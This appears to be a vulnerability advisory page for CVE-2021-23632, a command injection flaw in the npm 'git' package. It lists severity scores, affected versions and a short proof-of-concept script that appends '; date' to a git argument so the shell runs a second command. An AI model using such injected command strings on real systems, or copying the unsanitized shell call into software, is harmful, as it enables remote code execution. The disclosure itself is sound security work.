CVE-2021-23632: OS Command Injection in GIT

Severity
NVD: 9.8 CRITICAL
CNA: 6.6
EPSS: 3.4% (top 12.57%)
CISA KEV: Not in KEV
Exploit: No known exploits
Affected products: see Affected Packages below
Timeline
Published: Mar 17
Latest update: Mar 18

Description

All versions of the npm package git are vulnerable to Remote Code Execution (RCE) due to missing sanitization in the Git.git method: the user-supplied command string is handed to a shell, so it can execute arbitrary OS commands rather than just git subcommands.

Steps to Reproduce

1. Create a file named exploit.js with the following content:

```js
var Git = require("git").Git;
var repo = new Git("repo-test");
// The ";" is interpreted by the shell, so a second command runs after "git version".
var user_input = "version; date";
repo.git(user_input, function (err, result) {
  console.log(result);
});
```

2. In the same directory as exploit.js, run npm install

CVSS vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploitability: 3.9 | Impact: 5.9

Affected Packages (4 packages)

Source      | Package          | Affected versions
CVEListV5   | git/git          | < unspecified
CVEListV5   | git_project/git  | < unspecified
npm         | git/git          | 0.1.5
NVD         | git_project/git  | 0.1.5

Vulnerability Details (3 references)

OSV: Code injection in npm git (2022-03-18)
GHSA: Code injection in npm git (2022-03-18)
CVEList: Remote Code Execution (RCE) (2022-03-17)
CVE-2021-23632 — OS Command Injection in GIT | cvebase